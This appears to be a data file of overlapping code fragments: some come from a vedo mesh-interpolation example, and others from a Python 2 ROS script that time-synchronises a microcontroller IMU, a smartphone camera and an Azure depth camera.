"vmin=-1, vmax=1, name='gene') g1.mapPointsToCells() # move the array to cells (faces) g1.addScalarBar(horizontal=1, pos=(0.7,0.04))",
"on='cells', radius=0.1+eps, nullStrategy=1, nullValue=-1, ) g2.cmap('hot', 'gene', on='cells', vmin=-1, vmax=1).addScalarBar() show(g1, g2, __doc__,",
"# Make up some quad mesh with associated scalars g1 = Grid(res=(25,25)).wireframe(0).lw(1) scalars",
"name='gene') g1.mapPointsToCells() # move the array to cells (faces) g1.addScalarBar(horizontal=1, pos=(0.7,0.04)) g1.rotateZ(20) #",
"vmax=1, name='gene') g1.mapPointsToCells() # move the array to cells (faces) g1.addScalarBar(horizontal=1, pos=(0.7,0.04)) g1.rotateZ(20)",
"move the array to cells (faces) g1.addScalarBar(horizontal=1, pos=(0.7,0.04)) g1.rotateZ(20) # let's rotate it",
"array to cells (faces) g1.addScalarBar(horizontal=1, pos=(0.7,0.04)) g1.rotateZ(20) # let's rotate it a bit",
"on='cells', N=3) # Interpolate by picking points in a specified radius, # if",
"<gh_stars>1-10 \"\"\"Interpolate cell values from a quad-mesh to a tri-mesh\"\"\" from vedo import",
"radius set null value -1 g2.interpolateDataFrom( g1, on='cells', radius=0.1+eps, nullStrategy=1, nullValue=-1, ) g2.cmap('hot',",
"g2.interpolateDataFrom( g1, on='cells', radius=0.1+eps, nullStrategy=1, nullValue=-1, ) g2.cmap('hot', 'gene', on='cells', vmin=-1, vmax=1).addScalarBar() show(g1,",
"associated scalars g1 = Grid(res=(25,25)).wireframe(0).lw(1) scalars = g1.points()[:,1] g1.cmap(\"viridis\", scalars, vmin=-1, vmax=1, name='gene')",
"scalars = g1.points()[:,1] g1.cmap(\"viridis\", scalars, vmin=-1, vmax=1, name='gene') g1.mapPointsToCells() # move the array",
"# let's rotate it a bit so it's visible # Interpolate first mesh",
"from vedo import Grid, show # Make up some quad mesh with associated",
"\"\"\"Interpolate cell values from a quad-mesh to a tri-mesh\"\"\" from vedo import Grid,",
"g2 = Grid(res=(50,50)).pos(0.2, 0.2, 0.1).wireframe(0).lw(0) g2.triangulate() # Interpolate by averaging the closest 3",
"closest 3 points: #g2.interpolateDataFrom(g1, on='cells', N=3) # Interpolate by picking points in a",
"= Grid(res=(25,25)).wireframe(0).lw(1) scalars = g1.points()[:,1] g1.cmap(\"viridis\", scalars, vmin=-1, vmax=1, name='gene') g1.mapPointsToCells() # move",
"no points in that radius set null value -1 g2.interpolateDataFrom( g1, on='cells', radius=0.1+eps,",
"cell values from a quad-mesh to a tri-mesh\"\"\" from vedo import Grid, show",
"triangular mesh eps = 0.01 g2 = Grid(res=(50,50)).pos(0.2, 0.2, 0.1).wireframe(0).lw(0) g2.triangulate() # Interpolate",
"it a bit so it's visible # Interpolate first mesh onto a new",
"pos=(0.7,0.04)) g1.rotateZ(20) # let's rotate it a bit so it's visible # Interpolate",
"in a specified radius, # if there are no points in that radius",
"g1.addScalarBar(horizontal=1, pos=(0.7,0.04)) g1.rotateZ(20) # let's rotate it a bit so it's visible #",
"points in that radius set null value -1 g2.interpolateDataFrom( g1, on='cells', radius=0.1+eps, nullStrategy=1,",
"g1.points()[:,1] g1.cmap(\"viridis\", scalars, vmin=-1, vmax=1, name='gene') g1.mapPointsToCells() # move the array to cells",
"# if there are no points in that radius set null value -1",
"rotate it a bit so it's visible # Interpolate first mesh onto a",
"show # Make up some quad mesh with associated scalars g1 = Grid(res=(25,25)).wireframe(0).lw(1)",
"# Interpolate first mesh onto a new triangular mesh eps = 0.01 g2",
"mesh eps = 0.01 g2 = Grid(res=(50,50)).pos(0.2, 0.2, 0.1).wireframe(0).lw(0) g2.triangulate() # Interpolate by",
"by averaging the closest 3 points: #g2.interpolateDataFrom(g1, on='cells', N=3) # Interpolate by picking",
"Interpolate first mesh onto a new triangular mesh eps = 0.01 g2 =",
"mesh with associated scalars g1 = Grid(res=(25,25)).wireframe(0).lw(1) scalars = g1.points()[:,1] g1.cmap(\"viridis\", scalars, vmin=-1,",
"a tri-mesh\"\"\" from vedo import Grid, show # Make up some quad mesh",
"it's visible # Interpolate first mesh onto a new triangular mesh eps =",
"up some quad mesh with associated scalars g1 = Grid(res=(25,25)).wireframe(0).lw(1) scalars = g1.points()[:,1]",
"points in a specified radius, # if there are no points in that",
"#g2.interpolateDataFrom(g1, on='cells', N=3) # Interpolate by picking points in a specified radius, #",
"a bit so it's visible # Interpolate first mesh onto a new triangular",
"= Grid(res=(50,50)).pos(0.2, 0.2, 0.1).wireframe(0).lw(0) g2.triangulate() # Interpolate by averaging the closest 3 points:",
"tri-mesh\"\"\" from vedo import Grid, show # Make up some quad mesh with",
"from a quad-mesh to a tri-mesh\"\"\" from vedo import Grid, show # Make",
"so it's visible # Interpolate first mesh onto a new triangular mesh eps",
"there are no points in that radius set null value -1 g2.interpolateDataFrom( g1,",
"quad mesh with associated scalars g1 = Grid(res=(25,25)).wireframe(0).lw(1) scalars = g1.points()[:,1] g1.cmap(\"viridis\", scalars,",
"bit so it's visible # Interpolate first mesh onto a new triangular mesh",
"cells (faces) g1.addScalarBar(horizontal=1, pos=(0.7,0.04)) g1.rotateZ(20) # let's rotate it a bit so it's",
"# move the array to cells (faces) g1.addScalarBar(horizontal=1, pos=(0.7,0.04)) g1.rotateZ(20) # let's rotate",
"Grid(res=(50,50)).pos(0.2, 0.2, 0.1).wireframe(0).lw(0) g2.triangulate() # Interpolate by averaging the closest 3 points: #g2.interpolateDataFrom(g1,",
"value -1 g2.interpolateDataFrom( g1, on='cells', radius=0.1+eps, nullStrategy=1, nullValue=-1, ) g2.cmap('hot', 'gene', on='cells', vmin=-1,",
"# Interpolate by picking points in a specified radius, # if there are",
"if there are no points in that radius set null value -1 g2.interpolateDataFrom(",
"# Interpolate by averaging the closest 3 points: #g2.interpolateDataFrom(g1, on='cells', N=3) # Interpolate"
] |
[
": M[0,2], 'M10' : M[1,0], 'M11' : M[1,1], 'M12' : M[1,2], 'M20' :",
"remote.start_video() sm_remote_ts = sm_remote_ts_ns / 1e9; sm_frame_period = sm_frame_period_ns / 1e9 # Compute",
"# Gathering MCU and smartphone IMU data with ThreadPoolExecutor(max_workers=1) as executor: print_master('IMUs gathering",
"import matplotlib.pyplot as plt import signal import sys import select import os HOST",
"print 'Please, provide smartphone IP-address. For instance, 10.30.65.166' sys.exit() global HOST HOST =",
"'mcu_x', 'mcu_y', 'mcu_z', 'sm_time', 'sm_x', 'sm_y', 'sm_z'], index=False ) #debug_data_frame = pd.DataFrame.from_dict({ pd.DataFrame.from_dict({",
"pd.DataFrame.from_dict({ pd.DataFrame.from_dict({ 'comp_delay2' : [comp_delay2], 'sm_remote_ts' : [sm_remote_ts], 'sm_frame_period' :[sm_frame_period], 'mcu_desired_ts' : [mcu_desired_ts],",
": M[1,2], 'M20' : M[2,0], 'M21' : M[2,1], 'M22' : M[2,2] }).to_csv('/'.join( (path,",
"record_subprocess = subprocess.Popen(('rosrun data_collection record_all.sh').split()) subpr_list.append(record_subprocess) time.sleep(1) print_master('Recording is started')#\\nPress Ctrl+C to stop",
"index_col=False) sm_gyro_data = sm_df.iloc[1:, :3].to_numpy() sm_gyro_time = sm_df.iloc[1:, 3].to_numpy() / 1e9 # Equalize",
"= \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts_common #msg.time_ref = depth_cam_ts msg.source = str(sequence_num) publisher_indicator.publish(msg) sequence_num",
"if (value == \"\"): msg = TimeReference() #msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts_common",
"'M01' : M[0,1], 'M02' : M[0,2], 'M10' : M[1,0], 'M11' : M[1,1], 'M12'",
"address class bcolors: HEADER = '\\033[95m' OKBLUE = '\\033[94m' OKCYAN = '\\033[96m' OKGREEN",
"ThreadPoolExecutor import subprocess import rospy from sensor_msgs.msg import Imu, CameraInfo, TimeReference import numpy",
"indicate the next sequence') while True: input = select.select([sys.stdin], [], [], 0.01)[0] if",
"msg.header.stamp = mcu_cam_ts_common #msg.time_ref = depth_cam_ts msg.source = str(sequence_num) publisher_indicator.publish(msg) sequence_num += 1",
"'\\033[92m' WARNING = '\\033[93m' FAIL = '\\033[91m' ENDC = '\\033[0m' BOLD = '\\033[1m'",
"data.header.seq == 12: global mcu_cam_ts mcu_cam_ts = data.header.stamp global mcu_cam_ts_common mcu_cam_ts_common = data.header.stamp",
"debugging path = '/'.join( ('out', 'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) ) os.mkdir(path) #imu_data_frame = pd.DataFrame(np.vstack((t, data,",
"+ 'MASTER MESSAGE: ' + string + bcolors.ENDC) def print_master_error(string): print(bcolors.BOLD + bcolors.FAIL",
"= sys.stdin.readline().rstrip() if (value == \"\"): break rospy.init_node('master', anonymous=True) # 1. Twist-n-Sync start_duration",
"'M11' : M[1,1], 'M12' : M[1,2], 'M20' : M[2,0], 'M21' : M[2,1], 'M22'",
"break rospy.init_node('master', anonymous=True) # 1. Twist-n-Sync start_duration = 1 main_duration = 4 end_duration",
"to mcu.cpp send_offset_subprocess = subprocess.Popen((\"rosrun mcu_interface publish_s10_to_mcu_offset_client \" + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait() # 3.",
"while True: input = select.select([sys.stdin], [], [], 0.01)[0] if input: value = sys.stdin.readline().rstrip()",
"1e9 # Compute mcu desired timestamp mcu_desired_ts = sm_remote_ts - sm_mcu_clock_offset ''' #",
"# 3. Record data record_subprocess = subprocess.Popen(('rosrun data_collection record_all.sh').split()) subpr_list.append(record_subprocess) time.sleep(1) print_master('Recording is",
"subprocess.Popen(('rosrun data_collection record_all.sh').split()) subpr_list.append(record_subprocess) time.sleep(1) print_master('Recording is started')#\\nPress Ctrl+C to stop recording along",
".launch launched completely time.sleep(2) while True: print_master('Tap Enter to start Twist-n-Sync alignment process')",
"src.TimeSync import TimeSync2 import matplotlib as mpl #mpl.use('TkAgg') import matplotlib.pyplot as plt import",
"main_duration + end_duration), True, True, False) #mcu_imu_listener() mcu_imu_listener = rospy.Subscriber(\"mcu_imu\", Imu, mcu_imu_callback) time.sleep(start_duration)",
"path = '/'.join( ('out', 'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) ) os.mkdir(path) #imu_data_frame = pd.DataFrame(np.vstack((t, data, t,",
"(path, 'debug_data.csv') ), index=False) # Phase alignment align_camera_subprocess = subprocess.Popen((\"rosrun mcu_interface align_mcu_cam_phase_client \"",
"matplotlib.pyplot as plt import signal import sys import select import os HOST =",
"calibration and consequently TimeSync has succeeded if time_sync2.calibration_is_succeeded == False or time_sync2.calibration_is_succeeded is",
"= sm_remote_ts - sm_mcu_clock_offset ''' # Save some info print \"comp_delay2 \", comp_delay2",
"+ \\ '\\n' ) ''' # Added for debugging path = '/'.join( ('out',",
"import StringIO from src.TimeSync import TimeSync2 import matplotlib as mpl #mpl.use('TkAgg') import matplotlib.pyplot",
"Imu, CameraInfo, TimeReference import numpy as np import pandas as pd from io",
"SIGINT handler def signal_handler(sig, frame): print_master('Exiting') running_subpr_list = [] for subpr in subpr_list:",
"mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \\ sm_gyro_data[:min_length], sm_gyro_time[:min_length] # Obtain offset time_sync2 = TimeSync2( mcu_gyro_data, sm_gyro_data,",
"None mcu_cam_ts_common = None remote = None def mcu_imu_callback(data): dat = data.header.stamp.secs +",
"Register SIGINT handler def signal_handler(sig, frame): print_master('Exiting') running_subpr_list = [] for subpr in",
"mcu_imu_data = [] depth_cam_ts = None mcu_cam_ts = None mcu_cam_ts_common = None remote",
"Phase alignment align_camera_subprocess = subprocess.Popen((\"rosrun mcu_interface align_mcu_cam_phase_client \" + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait() # Some",
"1: global depth_cam_ts depth_cam_ts = data.header.stamp def mcu_cam_callback(data): if data.header.seq == 12: global",
"1e9 mcu_imu_time.append(dat) dat = data.angular_velocity mcu_imu_data.append([dat.x, dat.y, dat.z]) def depth_cam_callback(data): if data.header.seq ==",
"None # The smartphone's IP address class bcolors: HEADER = '\\033[95m' OKBLUE =",
"rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True, queue_size=10) global depth_cam_ts global mcu_cam_ts time_sleep_duration = 0.01 time_past =",
"sys.exit() signal.signal(signal.SIGINT, signal_handler) # Starting smartphone remote control global remote remote = RemoteControl(HOST)",
"IMU calibration and consequently TimeSync has succeeded if time_sync2.calibration_is_succeeded == False or time_sync2.calibration_is_succeeded",
"smartphone's IP address class bcolors: HEADER = '\\033[95m' OKBLUE = '\\033[94m' OKCYAN =",
"for p in running_subpr_list] if remote is not None: try: remote.stop_video() except: pass",
"= depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg) print_master('Tap Enter to start recording') raw_input() # Start video on",
"\", comp_delay2 print \"sm_mcu_clock_offset\", sm_mcu_clock_offset print \"sm_remote_ts \", sm_remote_ts #print \"sm_frame_period \", sm_frame_period",
"print \"comp_delay2 \", comp_delay2 print \"sm_mcu_clock_offset\", sm_mcu_clock_offset print \"sm_remote_ts \", sm_remote_ts #print \"sm_frame_period",
"time.sleep(time_sleep_duration) time_past += time_sleep_duration if time_past == 3: print('Timeout reached. Exiting') mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister()",
"def main(args): if len(args) == 1: print 'Please, provide smartphone IP-address. For instance,",
"FAIL = '\\033[91m' ENDC = '\\033[0m' BOLD = '\\033[1m' UNDERLINE = '\\033[4m' def",
"def mcu_cam_callback(data): if data.header.seq == 12: global mcu_cam_ts mcu_cam_ts = data.header.stamp global mcu_cam_ts_common",
"[comp_delay2], 'sm_remote_ts' : [sm_remote_ts], 'sm_frame_period' :[sm_frame_period], 'mcu_desired_ts' : [mcu_desired_ts], 'sm_mcu_clock_offset' : [sm_mcu_clock_offset], 'M00'",
"nodes launch_subprocess = subprocess.Popen(\"roslaunch data_collection data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess) # Wait until .launch launched completely",
"4 # Wait to avoid shaking time.sleep(1) # Gathering MCU and smartphone IMU",
"timestamp mcu_desired_ts = sm_remote_ts - sm_mcu_clock_offset ''' # Save some info print \"comp_delay2",
"def print_master_error(string): print(bcolors.BOLD + bcolors.FAIL + 'MASTER ERROR: ' + string + bcolors.ENDC)",
"time from src.RemoteControl import RemoteControl from concurrent.futures import ThreadPoolExecutor import subprocess import rospy",
"time_sync2.resample(accuracy=1) time_sync2.obtain_delay() # Check if IMU calibration and consequently TimeSync has succeeded if",
"+ time.strftime(\"%b_%d_%Y_%H_%M_%S\") + \".txt\", \"w+\") as out: out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' + \\ str(comp_delay2) +",
"'imu_data.csv') ), header=['mcu_time', 'mcu_x', 'mcu_y', 'mcu_z', 'sm_time', 'sm_x', 'sm_y', 'sm_z'], index=False ) #debug_data_frame",
"[], 2)[0] if input: value = sys.stdin.readline().rstrip() if (value == \"\"): break rospy.init_node('master',",
"BOLD = '\\033[1m' UNDERLINE = '\\033[4m' def print_master(string): print(bcolors.BOLD + bcolors.OKGREEN + 'MASTER",
"Equalize lengths min_length = min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0]) mcu_gyro_data, mcu_gyro_time, sm_gyro_data, sm_gyro_time = \\ mcu_gyro_data[:min_length],",
"sequence number: ' + str(sequence_num)) print_master('Tap Enter to indicate the next sequence') while",
"\"sm_frame_period \", sm_frame_period print \"np.mean(sm_gyro_time - mcu_gyro_time)\", np.mean(sm_gyro_time - mcu_gyro_time) print \"sm_gyro_time[0] \",",
"#print(gyro_data[:200]) # Show the problem of the first measurement # Get data from",
"+ comp_delay2 #sm_mcu_clock_offset = (sm_gyro_time[0] - mcu_gyro_time[0] + comp_delay2) # Show mean of",
"if time_past == 3: print('Timeout reached. Exiting') mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister() remote.close() sys.exit() depth_cam_listener.unregister()",
"from io import StringIO from src.TimeSync import TimeSync2 import matplotlib as mpl #mpl.use('TkAgg')",
"\\ str(comp_delay2) + ',' + str(sm_remote_ts) + ',' + str(mcu_desired_ts) + ',' +",
"and its info in mcu.cpp time.sleep(0.1) publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True, queue_size=10) global",
"10.30.65.166' sys.exit() global HOST HOST = args[1] # Register SIGINT handler def signal_handler(sig,",
"min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0]) mcu_gyro_data, mcu_gyro_time, sm_gyro_data, sm_gyro_time = \\ mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \\ sm_gyro_data[:min_length], sm_gyro_time[:min_length]",
"data.header.stamp def mcu_cam_callback(data): if data.header.seq == 12: global mcu_cam_ts mcu_cam_ts = data.header.stamp global",
"= None # The smartphone's IP address class bcolors: HEADER = '\\033[95m' OKBLUE",
"until .launch launched completely time.sleep(2) while True: print_master('Tap Enter to start Twist-n-Sync alignment",
"smartphone IMU data with ThreadPoolExecutor(max_workers=1) as executor: print_master('IMUs gathering started. Wait, please') future",
"#mpl.use('TkAgg') import matplotlib.pyplot as plt import signal import sys import select import os",
"indicate the next sequence') time.sleep(0.01); #remote.stop_video() #remote.close() #mcu_cam_listener.unregister() #publisher_depth_to_mcu_offset.unregister() if __name__ == '__main__':",
"time_sync2 = TimeSync2( mcu_gyro_data, sm_gyro_data, mcu_gyro_time, sm_gyro_time, False ) time_sync2.resample(accuracy=1) time_sync2.obtain_delay() # Check",
"message to mcu.cpp send_offset_subprocess = subprocess.Popen((\"rosrun mcu_interface publish_s10_to_mcu_offset_client \" + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait() #",
"Azure camera alignment depth_cam_listener = rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo, depth_cam_callback) mcu_cam_listener = rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference, mcu_cam_callback)",
"Save some info print \"comp_delay2 \", comp_delay2 print \"sm_mcu_clock_offset\", sm_mcu_clock_offset print \"sm_remote_ts \",",
"import RemoteControl from concurrent.futures import ThreadPoolExecutor import subprocess import rospy from sensor_msgs.msg import",
"import time from src.RemoteControl import RemoteControl from concurrent.futures import ThreadPoolExecutor import subprocess import",
"print(bcolors.BOLD + bcolors.FAIL + 'MASTER ERROR: ' + string + bcolors.ENDC) subpr_list =",
"[] for subpr in subpr_list: if subpr is not None: subpr.terminate() running_subpr_list.append(subpr) exit_codes",
"None or depth_cam_ts == None: time.sleep(time_sleep_duration) time_past += time_sleep_duration if time_past == 3:",
"+ string + bcolors.ENDC) subpr_list = [] mcu_imu_time = [] mcu_imu_data = []",
"anonymous=True) # 1. Twist-n-Sync start_duration = 1 main_duration = 4 end_duration = 4",
"to indicate the next sequence') while True: input = select.select([sys.stdin], [], [], 0.01)[0]",
"'mcu_desired_ts' : [mcu_desired_ts], 'sm_mcu_clock_offset' : [sm_mcu_clock_offset], 'M00' : M[0,0], 'M01' : M[0,1], 'M02'",
"'M22' : M[2,2] }).to_csv('/'.join( (path, 'debug_data.csv') ), index=False) #debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv') ), index=False)",
"= executor.submit(remote.get_imu, 1000 * (start_duration + main_duration + end_duration), True, True, False) #mcu_imu_listener()",
"0.01)[0] if input: value = sys.stdin.readline().rstrip() if (value == \"\"): msg = TimeReference()",
"sm_mcu_clock_offset ''' # Save some info print \"comp_delay2 \", comp_delay2 print \"sm_mcu_clock_offset\", sm_mcu_clock_offset",
"3. Record data record_subprocess = subprocess.Popen(('rosrun data_collection record_all.sh').split()) subpr_list.append(record_subprocess) time.sleep(1) print_master('Recording is started')#\\nPress",
"the problem of the first measurement # Get data from s10 imu sm_df",
"as plt import signal import sys import select import os HOST = None",
"publish_s10_to_mcu_offset_client \" + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait() # 3. Record data record_subprocess = subprocess.Popen(('rosrun data_collection",
"TimeReference() #msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts_common #msg.time_ref = depth_cam_ts msg.source = str(sequence_num)",
"== None: time.sleep(time_sleep_duration) time_past += time_sleep_duration if time_past == 3: print('Timeout reached. Exiting')",
"mcu_interface align_mcu_cam_phase_client \" + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait() # Some time needed to get camrera",
"start recording') raw_input() # Start video on s10 sm_remote_ts_ns, sm_frame_period_ns = remote.start_video() sm_remote_ts",
": M[0,1], 'M02' : M[0,2], 'M10' : M[1,0], 'M11' : M[1,1], 'M12' :",
"msg.time_ref = depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg) print_master('Tap Enter to start recording') raw_input() # Start video",
"plt.plot(sm_gyro_time - sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1), '--') plt.show() plt.pause(2) plt.close() # 2. Azure camera",
"str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait() # 3. Record data record_subprocess = subprocess.Popen(('rosrun data_collection record_all.sh').split()) subpr_list.append(record_subprocess) time.sleep(1)",
"to start Twist-n-Sync alignment process') input = select.select([sys.stdin], [], [], 2)[0] if input:",
"[], 0.01)[0] if input: value = sys.stdin.readline().rstrip() if (value == \"\"): msg =",
"HOST HOST = args[1] # Register SIGINT handler def signal_handler(sig, frame): print_master('Exiting') running_subpr_list",
"sys.exit() depth_cam_listener.unregister() #mcu_cam_listener.unregister() msg = TimeReference() msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts#[0] msg.time_ref",
"= TimeReference() #msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts_common #msg.time_ref = depth_cam_ts msg.source =",
"subprocess import rospy from sensor_msgs.msg import Imu, CameraInfo, TimeReference import numpy as np",
"'\\033[96m' OKGREEN = '\\033[92m' WARNING = '\\033[93m' FAIL = '\\033[91m' ENDC = '\\033[0m'",
"= 4 # Wait to avoid shaking time.sleep(1) # Gathering MCU and smartphone",
"str(mcu_desired_ts) + ',' + str(sm_mcu_clock_offset) + \\ '\\n' ) ''' # Added for",
"bcolors.FAIL + 'MASTER ERROR: ' + string + bcolors.ENDC) subpr_list = [] mcu_imu_time",
"mcu_imu_time.append(dat) dat = data.angular_velocity mcu_imu_data.append([dat.x, dat.y, dat.z]) def depth_cam_callback(data): if data.header.seq == 1:",
"# Get data from mcu imu mcu_gyro_data = np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract",
"Show mean of omegas to visually oversee sync performance plt.ion() plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1))",
"matplotlib as mpl #mpl.use('TkAgg') import matplotlib.pyplot as plt import signal import sys import",
"= np.mean(sm_gyro_time - mcu_gyro_time) + comp_delay2 #sm_mcu_clock_offset = (sm_gyro_time[0] - mcu_gyro_time[0] + comp_delay2)",
"as np import pandas as pd from io import StringIO from src.TimeSync import",
"future = executor.submit(remote.get_imu, 1000 * (start_duration + main_duration + end_duration), True, True, False)",
"print_master('IMUs gathering finished') # Get data from mcu imu mcu_gyro_data = np.asarray(mcu_imu_data) -",
"def mcu_imu_callback(data): dat = data.header.stamp.secs + data.header.stamp.nsecs / 1e9 mcu_imu_time.append(dat) dat = data.angular_velocity",
"the first measurement # Get data from s10 imu sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None,",
"+ str(sequence_num)) print_master('Tap Enter to indicate the next sequence') while True: input =",
"\"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts#[0] msg.time_ref = depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg) print_master('Tap Enter to start recording')",
"from src.TimeSync import TimeSync2 import matplotlib as mpl #mpl.use('TkAgg') import matplotlib.pyplot as plt",
"to stop recording along with everything and exit') publisher_indicator = rospy.Publisher('/sequences_ts', TimeReference, latch=True,",
"mcu.cpp cam_align_subprocess = subprocess.Popen(\"rosrun mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait() # Some time needed to get",
"(start_duration + main_duration + end_duration), True, True, False) #mcu_imu_listener() mcu_imu_listener = rospy.Subscriber(\"mcu_imu\", Imu,",
"numpy as np import pandas as pd from io import StringIO from src.TimeSync",
") #debug_data_frame = pd.DataFrame.from_dict({ pd.DataFrame.from_dict({ 'comp_delay2' : [comp_delay2], 'sm_remote_ts' : [sm_remote_ts], 'sm_frame_period' :[sm_frame_period],",
"[] mcu_imu_time = [] mcu_imu_data = [] depth_cam_ts = None mcu_cam_ts = None",
"+ str(mcu_desired_ts) + ',' + str(sm_mcu_clock_offset) + \\ '\\n' ) ''' # Added",
"plt import signal import sys import select import os HOST = None #",
"sys.exit() global HOST HOST = args[1] # Register SIGINT handler def signal_handler(sig, frame):",
"calibration failed. Exiting') remote.close() launch_subprocess.terminate() launch_subprocess.wait() sys.exit() comp_delay2 = time_sync2.time_delay M = time_sync2.M",
"''' # Save some info print \"comp_delay2 \", comp_delay2 print \"sm_mcu_clock_offset\", sm_mcu_clock_offset print",
"succeeded if time_sync2.calibration_is_succeeded == False or time_sync2.calibration_is_succeeded is None: print('IMU data calibration failed.",
"sensor_msgs.msg import Imu, CameraInfo, TimeReference import numpy as np import pandas as pd",
"in subpr_list: if subpr is not None: subpr.terminate() running_subpr_list.append(subpr) exit_codes = [p.wait() for",
"data calibration failed. Exiting') remote.close() launch_subprocess.terminate() launch_subprocess.wait() sys.exit() comp_delay2 = time_sync2.time_delay M =",
"# Start video on s10 sm_remote_ts_ns, sm_frame_period_ns = remote.start_video() sm_remote_ts = sm_remote_ts_ns /",
"with everything and exit') publisher_indicator = rospy.Publisher('/sequences_ts', TimeReference, latch=True, queue_size=10) #flag_to_process = True",
"dat = data.angular_velocity mcu_imu_data.append([dat.x, dat.y, dat.z]) def depth_cam_callback(data): if data.header.seq == 1: global",
"'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' + \\ str(comp_delay2) + ',' + str(sm_remote_ts) + ',' + str(mcu_desired_ts) +",
"HOST = args[1] # Register SIGINT handler def signal_handler(sig, frame): print_master('Exiting') running_subpr_list =",
"mcu_cam_ts = data.header.stamp global mcu_cam_ts_common mcu_cam_ts_common = data.header.stamp def main(args): if len(args) ==",
"',' + str(sm_remote_ts) + ',' + str(mcu_desired_ts) + ',' + str(sm_mcu_clock_offset) + \\",
"offset sm_mcu_clock_offset = np.mean(sm_gyro_time - mcu_gyro_time) + comp_delay2 #sm_mcu_clock_offset = (sm_gyro_time[0] - mcu_gyro_time[0]",
"subpr_list: if subpr is not None: subpr.terminate() running_subpr_list.append(subpr) exit_codes = [p.wait() for p",
"is not None: try: remote.stop_video() except: pass remote.close() sys.exit() signal.signal(signal.SIGINT, signal_handler) # Starting",
"\", mcu_desired_ts with open(\"out/\" + time.strftime(\"%b_%d_%Y_%H_%M_%S\") + \".txt\", \"w+\") as out: out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n'",
"# Wait to avoid shaking time.sleep(1) # Gathering MCU and smartphone IMU data",
"sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False) sm_gyro_data = sm_df.iloc[1:, :3].to_numpy() sm_gyro_time = sm_df.iloc[1:, 3].to_numpy()",
"t, data)).T) #imu_data_frame.to_csv( print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv( '/'.join( (path,",
"started. Wait, please') future = executor.submit(remote.get_imu, 1000 * (start_duration + main_duration + end_duration),",
"time_past += time_sleep_duration if time_past == 3: print('Timeout reached. Exiting') mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister()",
"frame): print_master('Exiting') running_subpr_list = [] for subpr in subpr_list: if subpr is not",
"- mcu_gyro_time[0] + comp_delay2) # Show mean of omegas to visually oversee sync",
"smartphone IP-address. For instance, 10.30.65.166' sys.exit() global HOST HOST = args[1] # Register",
"= subprocess.Popen(\"roslaunch data_collection data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess) # Wait until .launch launched completely time.sleep(2) while",
"dat.z]) def depth_cam_callback(data): if data.header.seq == 1: global depth_cam_ts depth_cam_ts = data.header.stamp def",
"out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' + \\ str(comp_delay2) + ',' + str(sm_remote_ts) + ',' + str(mcu_desired_ts)",
"time.sleep(main_duration) print_master('Put back') time.sleep(end_duration) #rospy.signal_shutdown('it is enough') mcu_imu_listener.unregister() print_master('AAA') _, sm_ascii_gyro_data, _ =",
"mcu_cam_ts == None or depth_cam_ts == None: time.sleep(time_sleep_duration) time_past += time_sleep_duration if time_past",
"M[1,1], 'M12' : M[1,2], 'M20' : M[2,0], 'M21' : M[2,1], 'M22' : M[2,2]",
"get a camera frame and its info in mcu.cpp time.sleep(0.1) publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset',",
"' + string + bcolors.ENDC) def print_master_error(string): print(bcolors.BOLD + bcolors.FAIL + 'MASTER ERROR:",
"global HOST HOST = args[1] # Register SIGINT handler def signal_handler(sig, frame): print_master('Exiting')",
"and consequently TimeSync has succeeded if time_sync2.calibration_is_succeeded == False or time_sync2.calibration_is_succeeded is None:",
